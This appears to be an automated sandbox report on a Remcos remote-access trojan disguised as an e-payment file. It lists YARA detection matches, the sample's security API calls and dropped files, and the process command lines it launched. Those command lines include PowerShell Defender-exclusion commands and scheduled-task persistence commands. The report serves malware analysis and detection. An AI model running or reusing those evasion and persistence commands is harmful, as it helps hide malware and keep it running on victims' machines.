            Source: 0.2.e-Payment.NET.CMS4006975815.exe.373cde8.6.raw.unpack, type: UNPACKEDPEMatched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.373cde8.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3753e08.9.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3753e08.9.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3753e08.9.raw.unpack, type: UNPACKEDPEMatched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3753e08.9.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 9.2.JXHPwNYzysUjKo.exe.38aa420.7.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 9.2.JXHPwNYzysUjKo.exe.38aa420.7.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
            Source: 9.2.JXHPwNYzysUjKo.exe.38aa420.7.raw.unpack, type: UNPACKEDPEMatched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
            Source: 9.2.JXHPwNYzysUjKo.exe.38aa420.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 00000009.00000002.1446098727.00000000038AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
            Source: 00000009.00000002.1444552308.0000000002899000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
            Source: 00000000.00000002.1411266191.000000000373C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
            Source: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
            Source: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
            Source: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 00000000.00000002.1409996431.0000000002729000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
            Source: e-Payment.NET.CMS4006975815.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: JXHPwNYzysUjKo.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: e-Payment.NET.CMS4006975815.exe, SliderControl.csBase64 encoded string: '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'
            Source: JXHPwNYzysUjKo.exe.0.dr, SliderControl.csBase64 encoded string: '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'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.390e848.8.raw.unpack, YHCOiHIm9y9U0KLt6C.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.390e848.8.raw.unpack, YHCOiHIm9y9U0KLt6C.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.390e848.8.raw.unpack, YHCOiHIm9y9U0KLt6C.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.5770000.12.raw.unpack, AMdNgs1C5Wh7whKrJR.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.5770000.12.raw.unpack, AMdNgs1C5Wh7whKrJR.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3967868.7.raw.unpack, AMdNgs1C5Wh7whKrJR.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3967868.7.raw.unpack, AMdNgs1C5Wh7whKrJR.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.5770000.12.raw.unpack, YHCOiHIm9y9U0KLt6C.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.5770000.12.raw.unpack, YHCOiHIm9y9U0KLt6C.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.5770000.12.raw.unpack, YHCOiHIm9y9U0KLt6C.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3967868.7.raw.unpack, YHCOiHIm9y9U0KLt6C.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3967868.7.raw.unpack, YHCOiHIm9y9U0KLt6C.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3967868.7.raw.unpack, YHCOiHIm9y9U0KLt6C.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.390e848.8.raw.unpack, AMdNgs1C5Wh7whKrJR.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.390e848.8.raw.unpack, AMdNgs1C5Wh7whKrJR.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 9.2.JXHPwNYzysUjKo.exe.2a37e08.4.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.28c7e80.1.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.4f90000.11.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.28a6cb0.3.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@19/16@0/1
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 13_2_0040CA41 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,13_2_0040CA41
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 13_2_004081B7 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,Process32NextW,CloseHandle,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,13_2_004081B7
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 13_2_00408150 FindResourceA,LoadResource,LockResource,SizeofResource,13_2_00408150
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeFile created: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7712:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8184:120:WilError_03
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7664:120:WilError_03
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeMutant created: \Sessions\1\BaseNamedObjects\bOZYTSsI
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeMutant created: \Sessions\1\BaseNamedObjects\remcos_rpklfmytvo
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7796:120:WilError_03
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeFile created: C:\Users\user\AppData\Local\Temp\tmpD623.tmpJump to behavior
            Source: e-Payment.NET.CMS4006975815.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: e-Payment.NET.CMS4006975815.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: e-Payment.NET.CMS4006975815.exeReversingLabs: Detection: 42%
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeFile read: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe "C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe"
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JXHPwNYzysUjKo" /XML "C:\Users\user\AppData\Local\Temp\tmpD623.tmp"
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess created: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe "C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JXHPwNYzysUjKo" /XML "C:\Users\user\AppData\Local\Temp\tmpE7F6.tmp"
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeProcess created: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe "C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe"
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe"Jump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe"Jump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JXHPwNYzysUjKo" /XML "C:\Users\user\AppData\Local\Temp\tmpD623.tmp"Jump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess created: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe "C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JXHPwNYzysUjKo" /XML "C:\Users\user\AppData\Local\Temp\tmpE7F6.tmp"Jump to behavior
